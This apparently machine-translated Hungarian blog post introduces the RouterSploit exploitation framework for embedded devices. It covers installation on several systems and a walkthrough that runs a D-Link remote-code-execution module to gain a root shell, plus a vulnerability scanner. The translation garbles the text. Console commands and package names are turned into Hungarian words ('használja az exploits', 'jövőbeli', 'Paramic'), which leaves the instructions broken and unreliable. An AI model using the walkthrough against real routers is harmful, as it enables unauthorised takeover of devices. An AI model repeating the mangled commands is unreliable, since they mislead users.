
RouterSploit egy csodálatos kihasználó keretrendszer, amely kifejezetten beágyazott eszközökhöz készült.
Ezt az eszközt a Pentester használhatja a kamerák és útválasztók biztonsági ellenőrzésére.
A RouterSploit kiemeli:
- Pythonban kódolva.
- Parancssori interfész.
- Docker támogatás.
- Moduláris eszközök.
Támogatott operációs rendszer:
- Mac operációs rendszer.
- Linux.
- Android telefon.
- ablakok.
A RouterSploit telepítése:
Követelmények:
- jövőbeli
- kéréseket
- Paramic
- Stop
- pycrypto
Választható:
- kékes – bluetooth alacsony energiafogyasztás
Telepítés Kali Linux alatt:
Kövesse az alábbi parancsokat:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy támogatás:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyTelepítés Ubuntuban:
Kövesse az alábbi parancsokat:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy támogatás:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyTelepítés MacOS-ra:
Kövesse az alábbi parancsokat:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.pyTelepítés a Dockerre:
Kövesse az alábbi parancsokat:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploitA RouterSploit frissítése?
A kellemetlenségek elkerülése érdekében gyakran frissítenie kell a RouterSploit szolgáltatást.
Szinte minden nap szállítanak új modulokat.
cd routersploit
git pullA RouterSploit használata?
Használat
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ _| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Exploitation Framework for |_| a Threat9 által Beágyazott eszközök Kódnév : Tudtam, hogy bajban vagy Verzió : 3.3.0 Kezdőlap : https://www.threat9.com/ - @threatnine Csatlakozz a Slackhez : routersploit.slack.com Csatlakozzon a Threat9 bétaprogramhoz - https://www.threat9.com/ Kizsákmányolás: 128 Szkennerek: 4 Creds: 165 Általános: 4 Hasznos terhek: 32 Kódolók: 6 rsf >
Kizsákmányolás:
A kizsákmányolás előkészítéséhez, csak válassza ki a modult, és állítsa be a célt:
rsf > használ exploit/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > használja az exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
A befejezéshez használja a tabulátor billentyűt.
Az opciók megjelenítéséhez, beírshow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > opciók megjelenítése Célzási lehetőségek: Név Aktuális beállítások Leírás ---- ---------------- ----------- cél Célcím pl. http://192.168.1.1 kikötő 80 Cél port
Használatrun vagyexploit parancsot a cél kihasználásához:
rsf (D-LINK DIR-300 & DIR-600 RCE) > fut [+] A cél sérülékeny [*] Parancshurok meghívása... cmd > whoami gyökér
Opciók beállításához:
rsf (D-LINK DIR-300 & DIR-600 RCE) > cél http beállítása://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Lehetőség van ellenőrizni, hogy a célpont sebezhető-e egy adott kizsákmányolással szemben:
rsf (D-LINK DIR-300 & DIR-600 RCE) > ellenőrzés [+] A cél sérülékeny
Futshow info a kihasználással kapcsolatos információk megjelenítéséhez.
Sebezhető célpontok keresése:
A szkennerek segítségével gyorsan ellenőrizhető, hogy a célpont sebezhető-e bármilyen kizsákmányolással szemben.
Ugyanazokat a parancsokat használja az opciók megjelenítéséhez/beállításához, és futni is.
rsf (D-Link szkenner) > fut [+] Az exploits/dlink/dwr_932_info_disclosure sebezhető [-] Az exploits/dlink/dir_300_320_615_auth_bypass nem sérülékeny [-] Az exploits/dlink/dsl_2750b_info_disclosure nem sérülékeny [-] Az exploits/dlink/dns_320l_327l_rce nem sérülékeny [-] Az exploits/dlink/dir_645_password_disclosure nem sérülékeny [-] Az exploits/dlink/dir_300_600_615_info_disclosure nem sebezhető [-] Az exploits/dlink/dir_300_600_rce nem sérülékeny [+] Az eszköz sebezhető! - exploits/dlink/dwr_932_info_disclosure
Olvassa el is: 1337x proxy
Végső szavak:
RouterSploit egy csodálatos eszköz a használatra.
Ha bármilyen problémával szembesül a RouterSploit. Ne felejtse el kommentálni lent. A CSHAWK csapatunk a lehető leghamarabb felveszi Önnel a kapcsolatot.